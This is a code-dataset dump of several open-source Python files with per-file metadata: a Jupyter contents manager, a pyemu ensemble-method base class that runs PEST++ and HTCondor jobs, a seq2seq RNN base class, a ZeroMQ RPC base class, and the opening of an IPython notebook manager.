"hash": 2854165040161782300,
"line_mean": 26.8461538462,
"line_max": 80,
"alpha_frac": 0.6147465438,
"autogenerated": false,
"ratio": 4.392712550607287,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.5507459094407288,
"avg_score": null,
"num_lines": null
} |
"""A base class for contents managers."""
# Copyright (c) Jupyter Development Team.
# Distributed under the terms of the Modified BSD License.
from fnmatch import fnmatch
import itertools
import json
import os
import re
from tornado.web import HTTPError, RequestHandler
from ...files.handlers import FilesHandler
from .checkpoints import Checkpoints
from traitlets.config.configurable import LoggingConfigurable
from nbformat import sign, validate as validate_nb, ValidationError
from nbformat.v4 import new_notebook
from ipython_genutils.importstring import import_item
from traitlets import (
Any,
Bool,
Dict,
Instance,
List,
TraitError,
Type,
Unicode,
validate,
default,
)
from ipython_genutils.py3compat import string_types
from notebook.base.handlers import IPythonHandler
from notebook.transutils import _
copy_pat = re.compile(r'\-Copy\d*\.')
class ContentsManager(LoggingConfigurable):
"""Base class for serving files and directories.
This serves any text or binary file,
as well as directories,
with special handling for JSON notebook documents.
Most APIs take a path argument,
which is always an API-style unicode path,
and always refers to a directory.
- unicode, not url-escaped
- '/'-separated
- leading and trailing '/' will be stripped
- if unspecified, path defaults to '',
indicating the root path.
"""
root_dir = Unicode('/', config=True)
allow_hidden = Bool(False, config=True, help="Allow access to hidden files")
notary = Instance(sign.NotebookNotary)
def _notary_default(self):
return sign.NotebookNotary(parent=self)
hide_globs = List(Unicode(), [
u'__pycache__', '*.pyc', '*.pyo',
'.DS_Store', '*.so', '*.dylib', '*~',
], config=True, help="""
Glob patterns to hide in file and directory listings.
""")
untitled_notebook = Unicode(_("Untitled"), config=True,
help="The base name used when creating untitled notebooks."
)
untitled_file = Unicode("untitled", config=True,
help="The base name used when creating untitled files."
)
untitled_directory = Unicode("Untitled Folder", config=True,
help="The base name used when creating untitled directories."
)
pre_save_hook = Any(None, config=True, allow_none=True,
help="""Python callable or importstring thereof
To be called on a contents model prior to save.
This can be used to process the structure,
such as removing notebook outputs or other side effects that
should not be saved.
It will be called as (all arguments passed by keyword)::
hook(path=path, model=model, contents_manager=self)
- model: the model to be saved. Includes file contents.
Modifying this dict will affect the file that is stored.
- path: the API path of the save destination
- contents_manager: this ContentsManager instance
"""
)
@validate('pre_save_hook')
def _validate_pre_save_hook(self, proposal):
value = proposal['value']
if isinstance(value, string_types):
value = import_item(self.pre_save_hook)
if not callable(value):
raise TraitError("pre_save_hook must be callable")
return value
def run_pre_save_hook(self, model, path, **kwargs):
"""Run the pre-save hook if defined, and log errors"""
if self.pre_save_hook:
try:
self.log.debug("Running pre-save hook on %s", path)
self.pre_save_hook(model=model, path=path, contents_manager=self, **kwargs)
except Exception:
self.log.error("Pre-save hook failed on %s", path, exc_info=True)
checkpoints_class = Type(Checkpoints, config=True)
checkpoints = Instance(Checkpoints, config=True)
checkpoints_kwargs = Dict(config=True)
@default('checkpoints')
def _default_checkpoints(self):
return self.checkpoints_class(**self.checkpoints_kwargs)
@default('checkpoints_kwargs')
def _default_checkpoints_kwargs(self):
return dict(
parent=self,
log=self.log,
)
files_handler_class = Type(
FilesHandler, klass=RequestHandler, allow_none=True, config=True,
help="""handler class to use when serving raw file requests.
Default is a fallback that talks to the ContentsManager API,
which may be inefficient, especially for large files.
Local files-based ContentsManagers can use a StaticFileHandler subclass,
which will be much more efficient.
Access to these files should be Authenticated.
"""
)
files_handler_params = Dict(
config=True,
help="""Extra parameters to pass to files_handler_class.
For example, StaticFileHandlers generally expect a `path` argument
specifying the root directory from which to serve files.
"""
)
def get_extra_handlers(self):
"""Return additional handlers
Default: self.files_handler_class on /files/.*
"""
handlers = []
if self.files_handler_class:
handlers.append(
(r"/files/(.*)", self.files_handler_class, self.files_handler_params)
)
return handlers
# ContentsManager API part 1: methods that must be
# implemented in subclasses.
def dir_exists(self, path):
"""Does a directory exist at the given path?
Like os.path.isdir
Override this method in subclasses.
Parameters
----------
path : string
The path to check
Returns
-------
exists : bool
Whether the path does indeed exist.
"""
raise NotImplementedError
def is_hidden(self, path):
"""Is path a hidden directory or file?
Parameters
----------
path : string
The path to check. This is an API path (`/` separated,
relative to root dir).
Returns
-------
hidden : bool
Whether the path is hidden.
"""
raise NotImplementedError
def file_exists(self, path=''):
"""Does a file exist at the given path?
Like os.path.isfile
Override this method in subclasses.
Parameters
----------
path : string
The API path of a file to check for.
Returns
-------
exists : bool
Whether the file exists.
"""
raise NotImplementedError('must be implemented in a subclass')
def exists(self, path):
"""Does a file or directory exist at the given path?
Like os.path.exists
Parameters
----------
path : string
The API path of a file or directory to check for.
Returns
-------
exists : bool
Whether the target exists.
"""
return self.file_exists(path) or self.dir_exists(path)
def get(self, path, content=True, type=None, format=None):
"""Get a file or directory model."""
raise NotImplementedError('must be implemented in a subclass')
def save(self, model, path):
"""
Save a file or directory model to path.
Should return the saved model with no content. Save implementations
should call self.run_pre_save_hook(model=model, path=path) prior to
writing any data.
"""
raise NotImplementedError('must be implemented in a subclass')
def delete_file(self, path):
"""Delete the file or directory at path."""
raise NotImplementedError('must be implemented in a subclass')
def rename_file(self, old_path, new_path):
"""Rename a file or directory."""
raise NotImplementedError('must be implemented in a subclass')
# ContentsManager API part 2: methods that have useable default
# implementations, but can be overridden in subclasses.
def delete(self, path):
"""Delete a file/directory and any associated checkpoints."""
path = path.strip('/')
if not path:
raise HTTPError(400, "Can't delete root")
self.delete_file(path)
self.checkpoints.delete_all_checkpoints(path)
def rename(self, old_path, new_path):
"""Rename a file and any checkpoints associated with that file."""
self.rename_file(old_path, new_path)
self.checkpoints.rename_all_checkpoints(old_path, new_path)
def update(self, model, path):
"""Update the file's path
For use in PATCH requests, to enable renaming a file without
re-uploading its contents. Only used for renaming at the moment.
"""
path = path.strip('/')
new_path = model.get('path', path).strip('/')
if path != new_path:
self.rename(path, new_path)
model = self.get(new_path, content=False)
return model
def info_string(self):
return "Serving contents"
def get_kernel_path(self, path, model=None):
"""Return the API path for the kernel
KernelManagers can turn this value into a filesystem path,
or ignore it altogether.
The default value here will start kernels in the directory of the
notebook server. FileContentsManager overrides this to use the
directory containing the notebook.
"""
return ''
def increment_filename(self, filename, path='', insert=''):
"""Increment a filename until it is unique.
Parameters
----------
filename : unicode
The name of a file, including extension
path : unicode
The API path of the target's directory
insert: unicode
The characters to insert after the base filename
Returns
-------
name : unicode
A filename that is unique, based on the input filename.
"""
# Extract the full suffix from the filename (e.g. .tar.gz)
path = path.strip('/')
basename, dot, ext = filename.rpartition('.')
if ext != 'ipynb':
basename, dot, ext = filename.partition('.')
suffix = dot + ext
for i in itertools.count():
if i:
insert_i = '{}{}'.format(insert, i)
else:
insert_i = ''
name = u'{basename}{insert}{suffix}'.format(basename=basename,
insert=insert_i, suffix=suffix)
if not self.exists(u'{}/{}'.format(path, name)):
break
return name
def validate_notebook_model(self, model):
"""Add failed-validation message to model"""
try:
validate_nb(model['content'])
except ValidationError as e:
model['message'] = u'Notebook validation failed: {}:\n{}'.format(
e.message, json.dumps(e.instance, indent=1, default=lambda obj: '<UNKNOWN>'),
)
return model
def new_untitled(self, path='', type='', ext=''):
"""Create a new untitled file or directory in path
path must be a directory
File extension can be specified.
Use `new` to create files with a fully specified path (including filename).
"""
path = path.strip('/')
if not self.dir_exists(path):
raise HTTPError(404, 'No such directory: %s' % path)
model = {}
if type:
model['type'] = type
if ext == '.ipynb':
model.setdefault('type', 'notebook')
else:
model.setdefault('type', 'file')
insert = ''
if model['type'] == 'directory':
untitled = self.untitled_directory
insert = ' '
elif model['type'] == 'notebook':
untitled = self.untitled_notebook
ext = '.ipynb'
elif model['type'] == 'file':
untitled = self.untitled_file
else:
raise HTTPError(400, "Unexpected model type: %r" % model['type'])
name = self.increment_filename(untitled + ext, path, insert=insert)
path = u'{0}/{1}'.format(path, name)
return self.new(model, path)
def new(self, model=None, path=''):
"""Create a new file or directory and return its model with no content.
To create a new untitled entity in a directory, use `new_untitled`.
"""
path = path.strip('/')
if model is None:
model = {}
if path.endswith('.ipynb'):
model.setdefault('type', 'notebook')
else:
model.setdefault('type', 'file')
# no content, not a directory, so fill out new-file model
if 'content' not in model and model['type'] != 'directory':
if model['type'] == 'notebook':
model['content'] = new_notebook()
model['format'] = 'json'
else:
model['content'] = ''
model['type'] = 'file'
model['format'] = 'text'
model = self.save(model, path)
return model
def copy(self, from_path, to_path=None):
"""Copy an existing file and return its new model.
If to_path not specified, it will be the parent directory of from_path.
If to_path is a directory, filename will increment `from_path-Copy#.ext`.
Considering multi-part extensions, the Copy# part will be placed before the first dot for all the extensions except `ipynb`.
For easier manual searching in case of notebooks, the Copy# part will be placed before the last dot.
from_path must be a full path to a file.
"""
path = from_path.strip('/')
if to_path is not None:
to_path = to_path.strip('/')
if '/' in path:
from_dir, from_name = path.rsplit('/', 1)
else:
from_dir = ''
from_name = path
model = self.get(path)
model.pop('path', None)
model.pop('name', None)
if model['type'] == 'directory':
raise HTTPError(400, "Can't copy directories")
if to_path is None:
to_path = from_dir
if self.dir_exists(to_path):
name = copy_pat.sub(u'.', from_name)
to_name = self.increment_filename(name, to_path, insert='-Copy')
to_path = u'{0}/{1}'.format(to_path, to_name)
model = self.save(model, to_path)
return model
def log_info(self):
self.log.info(self.info_string())
def trust_notebook(self, path):
"""Explicitly trust a notebook
Parameters
----------
path : string
The path of a notebook
"""
model = self.get(path)
nb = model['content']
self.log.warning("Trusting notebook %s", path)
self.notary.mark_cells(nb, True)
self.check_and_sign(nb, path)
def check_and_sign(self, nb, path=''):
"""Check for trusted cells, and sign the notebook.
Called as a part of saving notebooks.
Parameters
----------
nb : dict
The notebook dict
path : string
The notebook's path (for logging)
"""
if self.notary.check_cells(nb):
self.notary.sign(nb)
else:
self.log.warning("Notebook %s is not trusted", path)
def mark_trusted_cells(self, nb, path=''):
"""Mark cells as trusted if the notebook signature matches.
Called as a part of loading notebooks.
Parameters
----------
nb : dict
The notebook object (in current nbformat)
path : string
The notebook's path (for logging)
"""
trusted = self.notary.check_signature(nb)
if not trusted:
self.log.warning("Notebook %s is not trusted", path)
self.notary.mark_cells(nb, trusted)
def should_list(self, name):
"""Should this file/directory name be displayed in a listing?"""
return not any(fnmatch(name, glob) for glob in self.hide_globs)
# Part 3: Checkpoints API
def create_checkpoint(self, path):
"""Create a checkpoint."""
return self.checkpoints.create_checkpoint(self, path)
def restore_checkpoint(self, checkpoint_id, path):
"""
Restore a checkpoint.
"""
self.checkpoints.restore_checkpoint(self, checkpoint_id, path)
def list_checkpoints(self, path):
return self.checkpoints.list_checkpoints(path)
def delete_checkpoint(self, checkpoint_id, path):
return self.checkpoints.delete_checkpoint(checkpoint_id, path)
| {
"repo_name": "sserrot/champion_relationships",
"path": "venv/Lib/site-packages/notebook/services/contents/manager.py",
"copies": "1",
"size": "16942",
"license": "mit",
"hash": -1723043293957401300,
"line_mean": 30.8458646617,
"line_max": 132,
"alpha_frac": 0.5861763664,
"autogenerated": false,
"ratio": 4.436239853364755,
"config_test": true,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 1,
"avg_score": 0.00609762818004883,
"num_lines": 532
} |
"""A base class for developing prototype ensemble methods
"""
from __future__ import print_function, division
import os
from datetime import datetime
import shutil
import threading
import time
import warnings
import numpy as np
import pandas as pd
import pyemu
from pyemu.en import ParameterEnsemble, ObservationEnsemble
from pyemu.mat import Cov, Matrix
from pyemu.pst import Pst
from ..logger import Logger
class EnsembleMethod(object):
"""Base class for ensemble-type methods. Should not be instantiated directly
Parameters
----------
pst : pyemu.Pst or str
a control file instance or filename
parcov : pyemu.Cov or str
a prior parameter covariance matrix or filename. If None,
parcov is constructed from parameter bounds (diagonal)
obscov : pyemu.Cov or str
a measurement noise covariance matrix or filename. If None,
obscov is constructed from observation weights.
num_workers : int
number of workers to use in (local machine) parallel evaluation of the parmaeter
ensemble. If 0, serial evaluation is used. Ignored if submit_file is not None
submit_file : str
the name of a HTCondor submit file. If not None, HTCondor is used to
evaluate the parameter ensemble in parallel by issuing condor_submit
as a system command
port : int
the TCP port number to communicate on for parallel run management
worker_dir : str
path to a directory with a complete set of model files and PEST
interface files
"""
def __init__(
self,
pst,
parcov=None,
obscov=None,
num_workers=0,
use_approx_prior=True,
submit_file=None,
verbose=False,
port=4004,
worker_dir="template",
):
self.logger = Logger(verbose)
if verbose is not False:
self.logger.echo = True
self.num_workers = int(num_workers)
if submit_file is not None:
if not os.path.exists(submit_file):
self.logger.lraise("submit_file {0} not found".format(submit_file))
elif num_workers > 0:
if not os.path.exists(worker_dir):
self.logger.lraise("template dir {0} not found".format(worker_dir))
self.worker_dir = worker_dir
self.submit_file = submit_file
self.port = int(port)
self.paren_prefix = ".parensemble.{0:04d}.csv"
self.obsen_prefix = ".obsensemble.{0:04d}.csv"
if isinstance(pst, str):
pst = Pst(pst)
assert isinstance(pst, Pst)
self.pst = pst
self.sweep_in_csv = pst.pestpp_options.get(
"sweep_parameter_csv_file", "sweep_in.csv"
)
self.sweep_out_csv = pst.pestpp_options.get(
"sweep_output_csv_file", "sweep_out.csv"
)
if parcov is not None:
assert isinstance(parcov, Cov)
else:
parcov = Cov.from_parameter_data(self.pst)
if obscov is not None:
assert isinstance(obscov, Cov)
else:
obscov = Cov.from_observation_data(pst)
self.parcov = parcov
self.obscov = obscov
self._initialized = False
self.iter_num = 0
self.total_runs = 0
self.raw_sweep_out = None
def initialize(self, *args, **kwargs):
raise Exception(
"EnsembleMethod.initialize() must be implemented by the derived types"
)
def _calc_delta(self, ensemble, scaling_matrix=None):
"""
calc the scaled ensemble differences from the mean
"""
mean = np.array(ensemble.mean(axis=0))
delta = ensemble.as_pyemu_matrix()
for i in range(ensemble.shape[0]):
delta.x[i, :] -= mean
if scaling_matrix is not None:
delta = scaling_matrix * delta.T
delta *= 1.0 / np.sqrt(float(ensemble.shape[0] - 1.0))
return delta
def _calc_obs(self, parensemble):
self.logger.log("removing existing sweep in/out files")
try:
os.remove(self.sweep_in_csv)
except Exception as e:
self.logger.warn("error removing existing sweep in file:{0}".format(str(e)))
try:
os.remove(self.sweep_out_csv)
except Exception as e:
self.logger.warn(
"error removing existing sweep out file:{0}".format(str(e))
)
self.logger.log("removing existing sweep in/out files")
if parensemble.isnull().values.any():
parensemble.to_csv("_nan.csv")
self.logger.lraise(
"_calc_obs() error: NaNs in parensemble (written to '_nan.csv')"
)
if self.submit_file is None:
self._calc_obs_local(parensemble)
else:
self._calc_obs_condor(parensemble)
# make a copy of sweep out for restart purposes
# sweep_out = str(self.iter_num)+"_raw_"+self.sweep_out_csv
# if os.path.exists(sweep_out):
# os.remove(sweep_out)
# shutil.copy2(self.sweep_out_csv,sweep_out)
self.logger.log("reading sweep out csv {0}".format(self.sweep_out_csv))
failed_runs, obs = self._load_obs_ensemble(self.sweep_out_csv)
self.logger.log("reading sweep out csv {0}".format(self.sweep_out_csv))
self.total_runs += obs.shape[0]
self.logger.statement("total runs:{0}".format(self.total_runs))
return failed_runs, obs
def _load_obs_ensemble(self, filename):
if not os.path.exists(filename):
self.logger.lraise("obsensemble file {0} does not exists".format(filename))
obs = pd.read_csv(filename)
obs.columns = [item.lower() for item in obs.columns]
self.raw_sweep_out = obs.copy() # save this for later to support restart
assert (
"input_run_id" in obs.columns
), "'input_run_id' col missing...need newer version of sweep"
obs.index = obs.input_run_id
failed_runs = None
if 1 in obs.failed_flag.values:
failed_runs = obs.loc[obs.failed_flag == 1].index.values
self.logger.warn(
"{0} runs failed (indices: {1})".format(
len(failed_runs), ",".join([str(f) for f in failed_runs])
)
)
obs = ObservationEnsemble.from_dataframe(
df=obs.loc[:, self.obscov.row_names], pst=self.pst
)
if obs.isnull().values.any():
self.logger.lraise("_calc_obs() error: NaNs in obsensemble")
return failed_runs, obs
def _get_master_thread(self):
master_stdout = "_master_stdout.dat"
master_stderr = "_master_stderr.dat"
def master():
try:
# os.system("sweep {0} /h :{1} 1>{2} 2>{3}". \
# format(self.pst.filename, self.port, master_stdout, master_stderr))
pyemu.os_utils.run(
"pestpp-swp {0} /h :{1} 1>{2} 2>{3}".format(
self.pst.filename, self.port, master_stdout, master_stderr
)
)
except Exception as e:
self.logger.lraise("error starting condor master: {0}".format(str(e)))
with open(master_stderr, "r") as f:
err_lines = f.readlines()
if len(err_lines) > 0:
self.logger.warn(
"master stderr lines: {0}".format(
",".join([l.strip() for l in err_lines])
)
)
master_thread = threading.Thread(target=master)
master_thread.start()
time.sleep(2.0)
return master_thread
def _calc_obs_condor(self, parensemble):
self.logger.log(
"evaluating ensemble of size {0} with htcondor".format(parensemble.shape[0])
)
parensemble.to_csv(self.sweep_in_csv)
master_thread = self._get_master_thread()
condor_temp_file = "_condor_submit_stdout.dat"
condor_err_file = "_condor_submit_stderr.dat"
self.logger.log(
"calling condor_submit with submit file {0}".format(self.submit_file)
)
try:
os.system(
"condor_submit {0} 1>{1} 2>{2}".format(
self.submit_file, condor_temp_file, condor_err_file
)
)
except Exception as e:
self.logger.lraise("error in condor_submit: {0}".format(str(e)))
self.logger.log(
"calling condor_submit with submit file {0}".format(self.submit_file)
)
time.sleep(2.0) # some time for condor to submit the job and echo to stdout
condor_submit_string = "submitted to cluster"
with open(condor_temp_file, "r") as f:
lines = f.readlines()
self.logger.statement(
"condor_submit stdout: {0}".format(",".join([l.strip() for l in lines]))
)
with open(condor_err_file, "r") as f:
err_lines = f.readlines()
if len(err_lines) > 0:
self.logger.warn(
"stderr from condor_submit:{0}".format([l.strip() for l in err_lines])
)
cluster_number = None
for line in lines:
if condor_submit_string in line.lower():
cluster_number = int(float(line.split(condor_submit_string)[-1]))
if cluster_number is None:
self.logger.lraise("couldn't find cluster number...")
self.logger.statement("condor cluster: {0}".format(cluster_number))
master_thread.join()
self.logger.statement("condor master thread exited")
self.logger.log("calling condor_rm on cluster {0}".format(cluster_number))
os.system("condor_rm cluster {0}".format(cluster_number))
self.logger.log("calling condor_rm on cluster {0}".format(cluster_number))
self.logger.log(
"evaluating ensemble of size {0} with htcondor".format(parensemble.shape[0])
)
def _calc_obs_local(self, parensemble):
"""
propagate the ensemble forward using sweep.
"""
self.logger.log(
"evaluating ensemble of size {0} locally with sweep".format(
parensemble.shape[0]
)
)
parensemble.to_csv(self.sweep_in_csv)
if self.num_workers > 0:
master_thread = self._get_master_thread()
pyemu.utils.start_workers(
self.worker_dir,
"pestpp-swp",
self.pst.filename,
self.num_workers,
worker_root="..",
port=self.port,
)
master_thread.join()
else:
os.system("pestpp-swp {0}".format(self.pst.filename))
self.logger.log(
"evaluating ensemble of size {0} locally with sweep".format(
parensemble.shape[0]
)
)
def update(
self, lambda_mults=[1.0], localizer=None, run_subset=None, use_approx=True
):
raise Exception(
"EnsembleMethod.update() must be implemented by the derived types"
)
| {
"repo_name": "jtwhite79/pyemu",
"path": "pyemu/prototypes/ensemble_method.py",
"copies": "1",
"size": "11306",
"license": "bsd-3-clause",
"hash": -9055395939496956000,
"line_mean": 36.3135313531,
"line_max": 94,
"alpha_frac": 0.5669555988,
"autogenerated": false,
"ratio": 3.850817438692098,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.4917773037492098,
"avg_score": null,
"num_lines": null
} |
""" A base class for RNN. """
import torch.nn as nn
class BaseRNN(nn.Module):
r"""
Applies a multi-layer RNN to an input sequence.
Note:
Do not use this class directly, use one of the sub classes.
Args:
vocab_size (int): size of the vocabulary
max_len (int): maximum allowed length for the sequence to be processed
hidden_size (int): number of features in the hidden state `h`
input_dropout_p (float): dropout probability for the input sequence
dropout_p (float): dropout probability for the output sequence
n_layers (int): number of recurrent layers
rnn_cell (str): type of RNN cell (Eg. 'LSTM' , 'GRU')
Inputs: ``*args``, ``**kwargs``
- ``*args``: variable length argument list.
- ``**kwargs``: arbitrary keyword arguments.
Attributes:
SYM_MASK: masking symbol
SYM_EOS: end-of-sequence symbol
"""
SYM_MASK = "MASK"
SYM_EOS = "EOS"
def __init__(self, vocab_size, max_len, hidden_size, input_dropout_p, dropout_p, n_layers, rnn_cell):
super(BaseRNN, self).__init__()
self.vocab_size = vocab_size
self.max_len = max_len
self.hidden_size = hidden_size
self.n_layers = n_layers
self.input_dropout_p = input_dropout_p
self.input_dropout = nn.Dropout(p=input_dropout_p)
if rnn_cell.lower() == 'lstm':
self.rnn_cell = nn.LSTM
elif rnn_cell.lower() == 'gru':
self.rnn_cell = nn.GRU
else:
raise ValueError("Unsupported RNN Cell: {0}".format(rnn_cell))
self.dropout_p = dropout_p
def forward(self, *args, **kwargs):
raise NotImplementedError()
| {
"repo_name": "taras-sereda/pytorch-seq2seq",
"path": "seq2seq/models/baseRNN.py",
"copies": "1",
"size": "1714",
"license": "apache-2.0",
"hash": -7821490979932513000,
"line_mean": 34.7083333333,
"line_max": 105,
"alpha_frac": 0.6015169195,
"autogenerated": false,
"ratio": 3.726086956521739,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.9826621171619223,
"avg_score": 0.00019654088050314464,
"num_lines": 48
} |
"""A base class for RPC services and proxies.
Authors:
* Brian Granger
"""
#-----------------------------------------------------------------------------
# Copyright (C) 2012. Brian Granger, Min Ragan-Kelley
#
# Distributed under the terms of the BSD License. The full license is in
# the file COPYING.BSD, distributed as part of this software.
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Imports
#-----------------------------------------------------------------------------
import zmq
from zmq.eventloop.ioloop import IOLoop
from .serializer import PickleSerializer
#-----------------------------------------------------------------------------
# RPC base class
#-----------------------------------------------------------------------------
class RPCBase(object):
def __init__(self, loop=None, context=None, serializer=None):
"""Base class for RPC service and proxy.
Parameters
==========
loop : IOLoop
An existing IOLoop instance, if not passed, then IOLoop.instance()
will be used.
context : Context
An existing Context instance, if not passed, the Context.instance()
will be used.
serializer : Serializer
An instance of a Serializer subclass that will be used to serialize
and deserialize args, kwargs and the result.
"""
self.loop = loop if loop is not None else IOLoop.instance()
self.context = context if context is not None else zmq.Context.instance()
self.socket = None
self.stream = None
self._serializer = serializer if serializer is not None else PickleSerializer()
self.reset()
#-------------------------------------------------------------------------
# Public API
#-------------------------------------------------------------------------
def reset(self):
"""Reset the socket/stream."""
if isinstance(self.socket, zmq.Socket):
self.socket.close()
self._create_socket()
self.urls = []
def bind(self, url):
"""Bind the service to a url of the form proto://ip:port."""
self.urls.append(url)
self.socket.bind(url)
def connect(self, url):
"""Connect the service to a url of the form proto://ip:port."""
self.urls.append(url)
self.socket.connect(url)
| {
"repo_name": "ellisonbg/zpyrpc",
"path": "zpyrpc/base.py",
"copies": "1",
"size": "2496",
"license": "bsd-3-clause",
"hash": 6229002890283465000,
"line_mean": 32.7297297297,
"line_max": 87,
"alpha_frac": 0.4655448718,
"autogenerated": false,
"ratio": 5.461706783369803,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 1,
"avg_score": 0.01543741136147012,
"num_lines": 74
} |
"""A base class notebook manager.
Authors:
* Brian Granger
"""
#-----------------------------------------------------------------------------
# Copyright (C) 2011 The IPython Development Team
#
# Distributed under the terms of the BSD License. The full license is in
# the file COPYING, distributed as part of this software.
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Imports
#-----------------------------------------------------------------------------
import os
import uuid
from tornado import web
from IPython.config.configurable import LoggingConfigurable
from IPython.nbformat import current
from IPython.utils.traitlets import List, Dict, Unicode, TraitError
#-----------------------------------------------------------------------------
# Classes
#-----------------------------------------------------------------------------
class NotebookManager(LoggingConfigurable):
# Todo:
# The notebook_dir attribute is used to mean a couple of different things:
# 1. Where the notebooks are stored if FileNotebookManager is used.
# 2. The cwd of the kernel for a project.
# Right now we use this attribute in a number of different places and
# we are going to have to disentangle all of this.
notebook_dir = Unicode(os.getcwdu(), config=True, help="""
The directory to use for notebooks.
""")
def _notebook_dir_changed(self, name, old, new):
"""do a bit of validation of the notebook dir"""
if not os.path.isabs(new):
# If we receive a non-absolute path, make it absolute.
abs_new = os.path.abspath(new)
self.notebook_dir = abs_new
return
if os.path.exists(new) and not os.path.isdir(new):
raise TraitError("notebook dir %r is not a directory" % new)
if not os.path.exists(new):
self.log.info("Creating notebook dir %s", new)
try:
os.mkdir(new)
except:
raise TraitError("Couldn't create notebook dir %r" % new)
allowed_formats = List([u'json',u'py'])
# Map notebook_ids to notebook names
mapping = Dict()
def load_notebook_names(self):
"""Load the notebook names into memory.
This should be called once immediately after the notebook manager
is created to load the existing notebooks into the mapping in
memory.
"""
self.list_notebooks()
def list_notebooks(self):
"""List all notebooks.
This returns a list of dicts, each of the form::
dict(notebook_id=notebook,name=name)
This list of dicts should be sorted by name::
data = sorted(data, key=lambda item: item['name'])
"""
raise NotImplementedError('must be implemented in a subclass')
def new_notebook_id(self, name):
"""Generate a new notebook_id for a name and store its mapping."""
# TODO: the following will give stable urls for notebooks, but unless
# the notebooks are immediately redirected to their new urls when their
# filemname changes, nasty inconsistencies result. So for now it's
# disabled and instead we use a random uuid4() call. But we leave the
# logic here so that we can later reactivate it, whhen the necessary
# url redirection code is written.
#notebook_id = unicode(uuid.uuid5(uuid.NAMESPACE_URL,
# 'file://'+self.get_path_by_name(name).encode('utf-8')))
notebook_id = unicode(uuid.uuid4())
self.mapping[notebook_id] = name
return notebook_id
def delete_notebook_id(self, notebook_id):
"""Delete a notebook's id in the mapping.
This doesn't delete the actual notebook, only its entry in the mapping.
"""
del self.mapping[notebook_id]
def notebook_exists(self, notebook_id):
"""Does a notebook exist?"""
return notebook_id in self.mapping
def get_notebook(self, notebook_id, format=u'json'):
"""Get the representation of a notebook in format by notebook_id."""
format = unicode(format)
if format not in self.allowed_formats:
raise web.HTTPError(415, u'Invalid notebook format: %s' % format)
last_modified, nb = self.read_notebook_object(notebook_id)
kwargs = {}
if format == 'json':
# don't split lines for sending over the wire, because it
# should match the Python in-memory format.
kwargs['split_lines'] = False
data = current.writes(nb, format, **kwargs)
name = nb.metadata.get('name','notebook')
return last_modified, name, data
def read_notebook_object(self, notebook_id):
"""Get the object representation of a notebook by notebook_id."""
raise NotImplementedError('must be implemented in a subclass')
def save_new_notebook(self, data, name=None, format=u'json'):
"""Save a new notebook and return its notebook_id.
If a name is passed in, it overrides any values in the notebook data
and the value in the data is updated to use that value.
"""
if format not in self.allowed_formats:
raise web.HTTPError(415, u'Invalid notebook format: %s' % format)
try:
nb = current.reads(data.decode('utf-8'), format)
except:
raise web.HTTPError(400, u'Invalid JSON data')
if name is None:
try:
name = nb.metadata.name
except AttributeError:
raise web.HTTPError(400, u'Missing notebook name')
nb.metadata.name = name
notebook_id = self.write_notebook_object(nb)
return notebook_id
def save_notebook(self, notebook_id, data, name=None, format=u'json'):
"""Save an existing notebook by notebook_id."""
if format not in self.allowed_formats:
raise web.HTTPError(415, u'Invalid notebook format: %s' % format)
try:
nb = current.reads(data.decode('utf-8'), format)
except:
raise web.HTTPError(400, u'Invalid JSON data')
if name is not None:
nb.metadata.name = name
self.write_notebook_object(nb, notebook_id)
def write_notebook_object(self, nb, notebook_id=None):
"""Write a notebook object and return its notebook_id.
If notebook_id is None, this method should create a new notebook_id.
If notebook_id is not None, this method should check to make sure it
exists and is valid.
"""
raise NotImplementedError('must be implemented in a subclass')
def delete_notebook(self, notebook_id):
"""Delete notebook by notebook_id."""
raise NotImplementedError('must be implemented in a subclass')
def increment_filename(self, name):
"""Increment a filename to make it unique.
This exists for notebook stores that must have unique names. When a notebook
is created or copied this method constructs a unique filename, typically
by appending an integer to the name.
"""
return name
def new_notebook(self):
"""Create a new notebook and return its notebook_id."""
name = self.increment_filename('Untitled')
metadata = current.new_metadata(name=name)
nb = current.new_notebook(metadata=metadata)
notebook_id = self.write_notebook_object(nb)
return notebook_id
def copy_notebook(self, notebook_id):
"""Copy an existing notebook and return its notebook_id."""
last_mod, nb = self.read_notebook_object(notebook_id)
name = nb.metadata.name + '-Copy'
name = self.increment_filename(name)
nb.metadata.name = name
notebook_id = self.write_notebook_object(nb)
return notebook_id
# Checkpoint-related
def create_checkpoint(self, notebook_id):
"""Create a checkpoint of the current state of a notebook
Returns a checkpoint_id for the new checkpoint.
"""
raise NotImplementedError("must be implemented in a subclass")
def list_checkpoints(self, notebook_id):
"""Return a list of checkpoints for a given notebook"""
return []
def restore_checkpoint(self, notebook_id, checkpoint_id):
"""Restore a notebook from one of its checkpoints"""
raise NotImplementedError("must be implemented in a subclass")
def delete_checkpoint(self, notebook_id, checkpoint_id):
"""delete a checkpoint for a notebook"""
raise NotImplementedError("must be implemented in a subclass")
def log_info(self):
self.log.info(self.info_string())
def info_string(self):
return "Serving notebooks"
| {
"repo_name": "marcoantoniooliveira/labweb",
"path": "oscar/lib/python2.7/site-packages/IPython/html/services/notebooks/nbmanager.py",
"copies": "2",
"size": "8907",
"license": "bsd-3-clause",
"hash": -8183609429854685000,
"line_mean": 36.9021276596,
"line_max": 84,
"alpha_frac": 0.6003143595,
"autogenerated": false,
"ratio": 4.5121580547112465,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.6112472414211247,
"avg_score": null,
"num_lines": null
} |
"""A base class notebook manager.
Authors:
* Brian Granger
* Zach Sailer
"""
#-----------------------------------------------------------------------------
# Copyright (C) 2011 The IPython Development Team
#
# Distributed under the terms of the BSD License. The full license is in
# the file COPYING, distributed as part of this software.
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Imports
#-----------------------------------------------------------------------------
from fnmatch import fnmatch
import itertools
import os
from IPython.config.configurable import LoggingConfigurable
from IPython.nbformat import current, sign
from IPython.utils.traitlets import Instance, Unicode, List
#-----------------------------------------------------------------------------
# Classes
#-----------------------------------------------------------------------------
class NotebookManager(LoggingConfigurable):
filename_ext = Unicode(u'.ipynb')
notary = Instance(sign.NotebookNotary)
def _notary_default(self):
